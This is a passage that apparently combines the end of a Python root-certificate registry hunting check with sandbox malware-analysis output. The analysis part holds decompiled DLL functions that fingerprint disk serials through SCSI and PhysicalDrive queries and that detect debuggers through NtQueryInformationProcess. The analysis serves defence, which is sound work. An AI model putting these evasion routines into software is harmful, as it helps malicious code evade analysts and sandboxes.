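    return "".join("%02X" % b for b in hashlib.sha1(der).digest())


def registry_key_for(der: bytes) -> str:
    """Registry key (relative to HKLM for the LocalMachine store) the certificate is stored under."""
    return ROOT_KEY_FMT % thumbprint(der)


def build_blob(der: bytes) -> bytes:
    """Constructed "Blob" value with the two properties this example needs (layout is an assumption)."""
    blob = b""
    for propid, data in ((CERT_SHA1_HASH_PROP_ID, hashlib.sha1(der).digest()),
                         (CERT_CERT_PROP_ID, der)):
        blob += struct.pack("<III", propid, 1, len(data)) + data
    return blob


def parse_blob(blob: bytes) -> dict:
    """Split a "Blob" value into {property id: data}; raises on a truncated record."""
    props, off = {}, 0
    while off + 12 <= len(blob):
        propid, _reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if off + length > len(blob):
            raise ValueError("truncated property record")
        props[propid] = blob[off:off + length]
        off += length
    return props


def check_root_entry(key_name: str, blob: bytes) -> dict:
    """Hunting check: key name, stored SHA-1 property and SHA-1 of the certificate must all agree."""
    props = parse_blob(blob)
    der = props.get(CERT_CERT_PROP_ID)
    if der is None:
        raise ValueError("Blob carries no certificate")
    actual = thumbprint(der)
    stored = props.get(CERT_SHA1_HASH_PROP_ID, b"").hex().upper()
    return {
        "thumbprint": actual,
        "key_matches": key_name.upper() == actual,
        "stored_hash_matches": stored == actual,
    }


if __name__ == "__main__":
    der = pem_to_der(SAMPLE_PEM)
    print("would be stored under:", registry_key_for(der))
    print(check_root_entry(thumbprint(der), build_blob(der)))
```

On a live host the same checks apply to every subkey of HKLM\Software\Microsoft\SystemCertificates\Root\Certificates: a key whose name does not equal the SHA-1 of the certificate in its Blob, or whose stored hash property disagrees with the certificate, was not written through the CryptoAPI path this sample uses and deserves a closer look either way.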

                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                          			E1001D560(void* __edi, char* _a4) {
                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                          				struct _OVERLAPPED* _v12;
                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                          				struct _OVERLAPPED* _v20;
                                                                                                                                                                          				struct _OVERLAPPED* _v24;
                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                          				void* _v32;
                                                                                                                                                                          				short _v548;
                                                                                                                                                                          				char _v1010;
                                                                                                                                                                          				char _v1068;
                                                                                                                                                                          				char _v1070;
                                                                                                                                                                          				intOrPtr _v1084;
                                                                                                                                                                          				intOrPtr _v1092;
                                                                                                                                                                          				intOrPtr _v1096;
                                                                                                                                                                          				intOrPtr _v1100;
                                                                                                                                                                          				intOrPtr _v1104;
                                                                                                                                                                          				void _v1108;
                                                                                                                                                                          				char _v2132;
                                                                                                                                                                          				struct _OVERLAPPED* _v2136;
                                                                                                                                                                          				char _v2137;
                                                                                                                                                                          				long _v2144;
                                                                                                                                                                          				struct _OVERLAPPED* _v2148;
                                                                                                                                                                          				intOrPtr _v2152;
                                                                                                                                                                          				char* _v2156;
                                                                                                                                                                          				void* _t79;
                                                                                                                                                                          				int _t87;
                                                                                                                                                                          				intOrPtr _t91;
                                                                                                                                                                          				intOrPtr _t96;
                                                                                                                                                                          				void* _t125;
                                                                                                                                                                          				void* _t126;
                                                                                                                                                                          				void* _t127;
                                                                                                                                                                          
                                                                                                                                                                          				_t125 = __edi;
                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                          				_v2136 = 0;
                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                          				do {
                                                                                                                                                                           					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20); // device name of SCSI miniport N: \\.\Scsi0:, \\.\Scsi1:, ...
                                                                                                                                                                           					_t127 = _t127 + 0xc;
                                                                                                                                                                           					_t79 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0); // executed; GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING
                                                                                                                                                                          					_v32 = _t79;
                                                                                                                                                                          					if(_v32 != 0xffffffff) {
                                                                                                                                                                          						_v12 = 0;
                                                                                                                                                                          						while(1 != 0) {
                                                                                                                                                                           							E1000CF20(_t125,  &_v1108, 0, 0x22d); // zero the 0x22d-byte request/response buffer (SRB_IO_CONTROL + SENDCMDOUTPARAMS + 512-byte IDENTIFY data)
                                                                                                                                                                           							_t127 = _t127 + 0xc;
                                                                                                                                                                           							_v1104 = 0x49534353; // SRB_IO_CONTROL.Signature = "SCSI"
                                                                                                                                                                           							_v1100 = 0x4b534944; //                         "DISK"  -> "SCSIDISK"
                                                                                                                                                                           							_v1068 = _v12; // SENDCMDINPARAMS.bDriveNumber = drive index being probed (0 or 1)
                                                                                                                                                                           							_v1108 = 0x1c; // SRB_IO_CONTROL.HeaderLength = sizeof(SRB_IO_CONTROL) = 28
                                                                                                                                                                           							_v1096 = 0x2710; // SRB_IO_CONTROL.Timeout = 10000
                                                                                                                                                                           							_v1084 = 0x211; // SRB_IO_CONTROL.Length = 529 = sizeof(SENDCMDOUTPARAMS) + 512-byte IDENTIFY buffer
                                                                                                                                                                           							_v1092 = 0x1b0501; // SRB_IO_CONTROL.ControlCode = IOCTL_SCSI_MINIPORT_IDENTIFY
                                                                                                                                                                           							_v1070 = 0xec; // SENDCMDINPARAMS.irDriveRegs.bCommandReg = ID_CMD (ATA IDENTIFY DEVICE)
                                                                                                                                                                           							_t87 = DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0); // executed; 0x4d008 = IOCTL_SCSI_MINIPORT
                                                                                                                                                                           							if(_t87 == 0 || _v1010 == 0) { // IOCTL failed, or IDENTIFY word 27 (start of the model-number field, buffer offset 98) is empty
                                                                                                                                                                          								L20:
                                                                                                                                                                          								if(_v2136 != 0) {
                                                                                                                                                                          									L23:
                                                                                                                                                                          								} else {
                                                                                                                                                                          									_v12 =  &(_v12->Internal);
                                                                                                                                                                          									if(_v12 < 2) {
                                                                                                                                                                          										goto L23;
                                                                                                                                                                          									} else {
                                                                                                                                                                          										continue;
                                                                                                                                                                          									}
                                                                                                                                                                          								}
                                                                                                                                                                          							} else {
                                                                                                                                                                          								_v16 = 0;
                                                                                                                                                                          								do {
                                                                                                                                                                          									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
                                                                                                                                                                          									_v16 = _v16 + 1;
                                                                                                                                                                          								} while (_v16 < 0x100);
                                                                                                                                                                          								_t91 = E1001CD70( &_v2132);
                                                                                                                                                                          								_t127 = _t127 + 4;
                                                                                                                                                                          								_v28 = _t91;
                                                                                                                                                                          								_v2148 = 0;
                                                                                                                                                                          								_v8 = 0x104;
                                                                                                                                                                          								_v2156 = _a4;
                                                                                                                                                                          								_v2152 = _v28 - _a4;
                                                                                                                                                                          								while(_v8 != 0x80000106) {
                                                                                                                                                                          									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
                                                                                                                                                                          									if(_v2137 != 0) {
                                                                                                                                                                          										 *_v2156 = _v2137;
                                                                                                                                                                          										_v2156 = _v2156 + 1;
                                                                                                                                                                          										_t96 = _v8 - 1;
                                                                                                                                                                          										_v8 = _t96;
                                                                                                                                                                          										if(_t96 != 0) {
                                                                                                                                                                          											continue;
                                                                                                                                                                          										} else {
                                                                                                                                                                          											L17:
                                                                                                                                                                          											_v2156 = _v2156 - 1;
                                                                                                                                                                          											_v2148 = 0x8007007a;
                                                                                                                                                                          										}
                                                                                                                                                                          									} else {
                                                                                                                                                                          										break;
                                                                                                                                                                          									}
                                                                                                                                                                          									L18:
                                                                                                                                                                          									 *_v2156 = 0;
                                                                                                                                                                          									if(_v2148 < 0) {
                                                                                                                                                                          										goto L20;
                                                                                                                                                                          									} else {
                                                                                                                                                                          										goto L24;
                                                                                                                                                                          									}
                                                                                                                                                                          									goto L25;
                                                                                                                                                                          								}
                                                                                                                                                                          								if(_v8 == 0) {
                                                                                                                                                                          									goto L17;
                                                                                                                                                                          								} else {
                                                                                                                                                                          								}
                                                                                                                                                                          								goto L18;
                                                                                                                                                                          							}
                                                                                                                                                                          							L25:
                                                                                                                                                                          							FindCloseChangeNotification(_v32); // executed
                                                                                                                                                                          							_v20 = _v24;
                                                                                                                                                                          							goto L26;
                                                                                                                                                                          						}
                                                                                                                                                                          						L24:
                                                                                                                                                                          						_v2136 = 1;
                                                                                                                                                                          						goto L25;
                                                                                                                                                                          					}
                                                                                                                                                                          					L26:
                                                                                                                                                                          					_v20 =  &(_v20->Internal);
                                                                                                                                                                          					_v24 = _v20;
                                                                                                                                                                          				} while (_v20 < 0x10);
                                                                                                                                                                          				return _v2136;
                                                                                                                                                                          			}

                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfW.USER32 ref: 1001D591
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D5B0
                                                                                                                                                                          • _memset.LIBCMT ref: 1001D5E5
                                                                                                                                                                          • DeviceIoControl.KERNELBASE(000000FF,0004D008,0000001C,0000003C,0000001C,0000022D,?,00000000), ref: 1001D660
                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001D7A2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ChangeCloseControlCreateDeviceFileFindNotification_memsetwsprintf
                                                                                                                                                                          • String ID: DISK$SCSI$\\.\Scsi%d:$z
                                                                                                                                                                          • API String ID: 2954624657-153650326
                                                                                                                                                                          • Opcode ID: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                                          • Instruction ID: ecac459a45c55c39d0c7666526aefe1c13258bf2a5e68f6ccc56cd30cf696479
                                                                                                                                                                          • Opcode Fuzzy Hash: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                                          • Instruction Fuzzy Hash: 8C613AB4D04258DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB281DB759AC4CF95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                          			E1001D7E0(void* __edi, intOrPtr _a4) {
                                                                                                                                                                          				char _v8;
                                                                                                                                                                          				void* _v12;
                                                                                                                                                                          				void* _v16;
                                                                                                                                                                          				void* _v20;
                                                                                                                                                                          				void* _v24;
                                                                                                                                                                          				void* _v28;
                                                                                                                                                                          				void* _v32;
                                                                                                                                                                          				void* _v36;
                                                                                                                                                                          				void* _v40;
                                                                                                                                                                          				signed short* _v44;
                                                                                                                                                                          				void* _v48;
                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                          				signed int* _v60;
                                                                                                                                                                          				char _v570;
                                                                                                                                                                          				short _v572;
                                                                                                                                                                          				char _v1596;
                                                                                                                                                                          				void* _v1600;
                                                                                                                                                                          				char _v1604;
                                                                                                                                                                          				long _v1608;
                                                                                                                                                                          				signed int _v1612;
                                                                                                                                                                          				void* _v1616;
                                                                                                                                                                          				void* _v1620;
                                                                                                                                                                          				void* _v1624;
                                                                                                                                                                          				void* _v1628;
                                                                                                                                                                          				void* _v1632;
                                                                                                                                                                          				signed int _v1633;
                                                                                                                                                                          				void _v1636;
                                                                                                                                                                          				char _v2148;
                                                                                                                                                                          				char _v2164;
                                                                                                                                                                          				void* _t73;
                                                                                                                                                                          				int _t78;
                                                                                                                                                                          				void* _t88;
                                                                                                                                                                          				void* _t94;
                                                                                                                                                                          				void* _t123;
                                                                                                                                                                          				void* _t124;
                                                                                                                                                                          
                                                                                                                                                                          				_t123 = __edi;
                                                                                                                                                                          				_v52 = _a4;
                                                                                                                                                                          				if(_a4 == 0) {
                                                                                                                                                                          					L18:
                                                                                                                                                                          					return 0;
                                                                                                                                                                          				}
                                                                                                                                                                          				_v1600 = 0;
                                                                                                                                                                          				_v1612 = 0;
                                                                                                                                                                          				while(1 != 0) {
                                                                                                                                                                          					_v572 = 0;
                                                                                                                                                                          					E1000CF20(_t123,  &_v570, 0, 0x1fe);
                                                                                                                                                                          					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
                                                                                                                                                                          					_t124 = _t124 + 0x18;
                                                                                                                                                                          					_t73 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0); // executed
                                                                                                                                                                          					_v48 = _t73;
                                                                                                                                                                          					if(_v48 == 0xffffffff) {
                                                                                                                                                                          						L15:
                                                                                                                                                                          						_v1612 = 1 + _v1612;
                                                                                                                                                                          						if(_v1612 < 4) {
                                                                                                                                                                          							continue;
                                                                                                                                                                          						}
                                                                                                                                                                          						return _v1600;
                                                                                                                                                                          					}
                                                                                                                                                                          					_v1608 = 0;
                                                                                                                                                                          					_v1636 = 0;
                                                                                                                                                                          					_v1632 = 0;
                                                                                                                                                                          					_v1628 = 0;
                                                                                                                                                                          					_v1624 = 0;
                                                                                                                                                                          					_v1620 = 0;
                                                                                                                                                                          					_v1616 = 0;
                                                                                                                                                                          					_t78 = DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0); // executed
                                                                                                                                                                          					if(_t78 == 0) {
                                                                                                                                                                          						CloseHandle(_v48);
                                                                                                                                                                          						goto L15;
                                                                                                                                                                          					}
                                                                                                                                                                          					if((_v1633 & 0x000000ff) == 0) {
                                                                                                                                                                          						L11:
                                                                                                                                                                          						CloseHandle(_v48);
                                                                                                                                                                          						if(_v1600 == 0) {
                                                                                                                                                                          							goto L15;
                                                                                                                                                                          						}
                                                                                                                                                                          						return _v1600;
                                                                                                                                                                          					}
                                                                                                                                                                          					asm("sbb edx, edx");
                                                                                                                                                                          					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
                                                                                                                                                                          					_v40 = 0;
                                                                                                                                                                          					_v36 = 0;
                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                          					_v28 = 0;
                                                                                                                                                                          					_v24 = 0;
                                                                                                                                                                          					_v20 = 0;
                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                          					E1000CF20(_t123,  &_v2164, 0, 0x210);
                                                                                                                                                                          					_t88 = E1001CF20( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
                                                                                                                                                                          					_t124 = _t124 + 0x24;
                                                                                                                                                                          					if(_t88 == 0) {
                                                                                                                                                                          						goto L11;
                                                                                                                                                                          					}
                                                                                                                                                                          					_v60 =  &_v1596;
                                                                                                                                                                          					_v44 =  &_v2148;
                                                                                                                                                                          					do {
                                                                                                                                                                          						 *_v60 =  *_v44 & 0x0000ffff;
                                                                                                                                                                          						_v44 =  &(_v44[1]);
                                                                                                                                                                          						_v60 =  &(_v60[1]);
                                                                                                                                                                          					} while (_v44 <  &_v1636);
                                                                                                                                                                          					_v56 = E1001CD70( &_v1596);
                                                                                                                                                                          					_t94 = E1001CFA0(_v56, 0x104, _v52);
                                                                                                                                                                          					_t124 = _t124 + 0x10;
                                                                                                                                                                          					if(_t94 == 0) {
                                                                                                                                                                          						_v1600 = 1;
                                                                                                                                                                          					}
                                                                                                                                                                          					goto L11;
                                                                                                                                                                          				}
                                                                                                                                                                          				goto L18;
                                                                                                                                                                          			}
                                                                                                                                                                          0x1001d7e0
                                                                                                                                                                          0x1001d7ec
                                                                                                                                                                          0x1001d7f3
                                                                                                                                                                          0x1001da64
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001da64
                                                                                                                                                                          0x1001d7f9
                                                                                                                                                                          0x1001d803
                                                                                                                                                                          0x1001d80d
                                                                                                                                                                          0x1001d81a
                                                                                                                                                                          0x1001d831
                                                                                                                                                                          0x1001d84c
                                                                                                                                                                          0x1001d852
                                                                                                                                                                          0x1001d86b
                                                                                                                                                                          0x1001d871
                                                                                                                                                                          0x1001d878
                                                                                                                                                                          0x1001da3d
                                                                                                                                                                          0x1001da4c
                                                                                                                                                                          0x1001da55

APIs
• _memset.LIBCMT ref: 1001D831
• wsprintfW.USER32 ref: 1001D84C
• CreateFileW.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D86B
• DeviceIoControl.KERNELBASE(000000FF,00074080,00000000,00000000,00000000,00000018,00000000,00000000), ref: 1001D8E3
• _memset.LIBCMT ref: 1001D96F
• CloseHandle.KERNEL32(000000FF), ref: 1001DA1A
• CloseHandle.KERNEL32(000000FF), ref: 1001DA37
Strings
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
• String ID: \\.\PhysicalDrive%d
• API String ID: 381188756-2935326385
• Opcode ID: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
• Instruction ID: e843174948dd7abc5fb59b2edd762e96836351ae516af004f3d86572885adcf9
• Opcode Fuzzy Hash: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
• Instruction Fuzzy Hash: 21613DB1D04218ABEB20DF54CC95BDDB7B6EF84304F148199E509BB280D776AA94CF91
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%
// Walks \\.\PhysicalDrive0..3, queries each disk's STORAGE_DEVICE_DESCRIPTOR via
// IOCTL_STORAGE_QUERY_PROPERTY (0x2d1400) and derives a string from the descriptor's
// SerialNumberOffset field (offset 24). Returns 1 as soon as the helper E1001CFA0
// reports that string as matching _a4, 0 otherwise. Typical use of this pattern is a
// disk-serial fingerprint check (host identification / sandbox-VM detection).
E1001DA70(void* __edi, intOrPtr _a4) {
	struct _OVERLAPPED* _v8;    // drive index 0..3 (the OVERLAPPED* typing is a decompiler artefact)
	struct _OVERLAPPED* _v12;   // result flag: 1 = match found
	void* _v16;                 // handle returned by CreateFileW
	short _v532;                // wide-char device path buffer
	struct _OVERLAPPED* _v536;  // _v544.._v536: 12-byte STORAGE_PROPERTY_QUERY
	struct _OVERLAPPED* _v540;  //   (PropertyId = StorageDeviceProperty, QueryType = PropertyStandardQuery)
	void _v544;
	long _v548;                 // bytes returned by DeviceIoControl
	struct _OVERLAPPED* _v552;  // saved copy of the drive index
	intOrPtr _v10532;           // offset 24 into _v10556 = STORAGE_DEVICE_DESCRIPTOR.SerialNumberOffset
	void _v10556;               // 0x2710-byte output buffer for the descriptor and its trailing strings
	char _v11556;               // 0x3e8-byte buffer for the extracted serial string
	void* _t43;
	int _t48;
	void* _t56;
	void* _t70;
	void* _t71;

	_t70 = __edi;
	E10018AA0(0x2d20); // stack probe for the ~11.5 KB of local buffers
	if(_a4 == 0) {
		L13:
		return 0;
	}
	_v8 = 0;
	_v12 = 0;
	_v552 = 0;
	while(1 != 0) {
		wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
		_t71 = _t71 + 0xc; // cdecl stack clean-up after the 3-argument call
		// dwDesiredAccess = 0 (metadata only, no read/write of sectors),
		// dwShareMode = FILE_SHARE_READ | FILE_SHARE_WRITE, OPEN_EXISTING
		_t43 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0); // executed
		_v16 = _t43;
		if(_v16 == 0xffffffff) { // INVALID_HANDLE_VALUE: drive absent or inaccessible
			L10:
			_v8 =  &(_v8->Internal); // drive index + 1
			_v552 = _v8;
			if(_v8 < 4) { // only the first four physical drives are examined
				continue;
			}
			return _v12;
		}
		_v548 = 0;
		_v536 = 0;
		_v544 = 0; // PropertyId = StorageDeviceProperty (0)
		_v540 = 0; // QueryType = PropertyStandardQuery (0)
		E1000CF20(_t70,  &_v10556, 0, 0x2710); // zero-fill the output buffer (memset-style helper, not shown here)
		_t71 = _t71 + 0xc;
		// 0x2d1400 = IOCTL_STORAGE_QUERY_PROPERTY; 0xc-byte query in, 0x2710-byte descriptor out
		_t48 = DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0); // executed
		if(_t48 != 0) {
			E1000CF20(_t70,  &_v11556, 0, 0x3e8);
			// resolve SerialNumberOffset against the descriptor and produce the serial string in _v11556
			E1001D040(_v10532,  &_v10556,  &_v11556);
			// compare the extracted string (bounded by 0x104 = MAX_PATH) with the caller-supplied _a4;
			// E1001CFA0 is not shown on this page, a zero return sets the success flag
			_t56 = E1001CFA0( &_v11556, 0x104, _a4);
			_t71 = _t71 + 0x24;
			if(_t56 == 0) {
				_v12 = 1;
			}
		}
		// closes the CreateFileW handle (the decompiler resolved the import as FindCloseChangeNotification)
		FindCloseChangeNotification(_v16); // executed
		if(_v12 == 0) {
			_v8 = _v552;
			goto L10; // no match on this drive, try the next one
		} else {
			return _v12; // match found: stop at the first matching drive
		}
	}
	goto L13; // unreachable
}

                                                                                                                                                                          0x1001dba7
                                                                                                                                                                          0x1001dbb4
                                                                                                                                                                          0x1001dbbe
                                                                                                                                                                          0x1001dbcb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001dbc0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001dbc0
                                                                                                                                                                          0x1001dbbe
                                                                                                                                                                          0x00000000

APIs
• wsprintfW.USER32 ref: 1001DABC
• CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
• _memset.LIBCMT ref: 1001DB21
• DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DB50
• _memset.LIBCMT ref: 1001DB68
• FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DBB4
Strings
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: _memset$ChangeCloseControlCreateDeviceFileFindNotificationwsprintf
• String ID: \\.\PhysicalDrive%d
• API String ID: 198797371-2935326385
• Opcode ID: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
• Instruction ID: bc891f1c4ccce3a70caf683a604835e8428f56d0e5539b736f6604e1ef8a2667
• Opcode Fuzzy Hash: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
• Instruction Fuzzy Hash: A6412B75D40218EBEB10EB90DC99FDDB7B8EB14704F108599E509AA281D7B4AB88CF91
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
#include <windows.h>
#include <winternl.h>

// Anti-debug check: queries information class 0x1f (ProcessDebugFlags).
// The kernel reports 1 (NoDebugInherit) when no debugger is attached, so any
// value other than 1 means the process is being debugged. NtQueryInformationProcess
// is resolved at run time via LoadLibraryA/GetProcAddress rather than imported.
int E10019F00() {
	unsigned long _v8;
	FARPROC _v12;
	struct HINSTANCE__* _v16;

	_v8 = 1;
	_v16 = LoadLibraryA("Ntdll.dll");
	_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
	NtQueryInformationProcess(GetCurrentProcess(), 0x1f, &_v8, 4, 0);
	return _v8 != 0x00000001;
}

APIs
• LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F12
• GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F24
• GetCurrentProcess.KERNEL32(0000001F,00000001,00000004,00000000), ref: 10019F37
• NtQueryInformationProcess.NTDLL(00000000), ref: 10019F3E
Strings
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
• String ID: NtQueryInformationProcess$Ntdll.dll
• API String ID: 3653371871-801751246
• Opcode ID: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
• Instruction ID: 96ba2470dd98e020bf0cfbce012c3df4c205278cc2531598ec11657ea2300d3b
• Opcode Fuzzy Hash: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
• Instruction Fuzzy Hash: F5F03075D00208FFEB00DFE0CC8DADCBB74EB04301F508094FA01A6140D6745A48CB61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
#include <windows.h>
#include <winternl.h>

// Anti-debug check: queries information class 0x1e (ProcessDebugObjectHandle).
// When a debugger is attached the call writes a non-zero debug object handle;
// otherwise it fails and the buffer keeps its initial 0, so non-zero means debugged.
// NtQueryInformationProcess is resolved at run time via LoadLibraryA/GetProcAddress.
int E10019F50() {
	unsigned long _v8;
	FARPROC _v12;
	struct HINSTANCE__* _v16;

	_v8 = 0;
	_v16 = LoadLibraryA("Ntdll.dll");
	_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
	NtQueryInformationProcess(GetCurrentProcess(), 0x1e, &_v8, 4, 0);
	return _v8 != 0x00000000;
}

APIs
• LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F62
• GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F74
• GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 10019F87
• NtQueryInformationProcess.NTDLL(00000000), ref: 10019F8E
Strings
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
• String ID: NtQueryInformationProcess$Ntdll.dll
• API String ID: 3653371871-801751246
• Opcode ID: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
• Instruction ID: 4290971ec9e7b3841b7fe9691c0d5d42a9a3d927b1d111e6c5789e877817e371
• Opcode Fuzzy Hash: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
• Instruction Fuzzy Hash: 7FF0A575900218FBEB00EBE0DD89BDDBBB8EB04705F618498EA01A6280DA745A49DB65
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
#include <windows.h>
#include <winternl.h>

// Anti-debug check: queries information class 7 (ProcessDebugPort).
// The kernel returns a non-zero value (0xFFFFFFFF) when a debugger is attached
// and 0 otherwise, so the function reports non-zero as "debugged".
// NtQueryInformationProcess is resolved at run time via LoadLibraryA/GetProcAddress.
int E10019FA0() {
	unsigned long _v8;
	FARPROC _v12;
	struct HINSTANCE__* _v16;

	_v8 = 0;
	_v16 = LoadLibraryA("Ntdll.dll");
	_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
	NtQueryInformationProcess(GetCurrentProcess(), 7, &_v8, 4, 0);
	return _v8 != 0x00000000;
}

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019FB2
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019FC4
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 10019FD7
                                                                                                                                                                          • NtQueryInformationProcess.NTDLL(00000000), ref: 10019FDE
                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
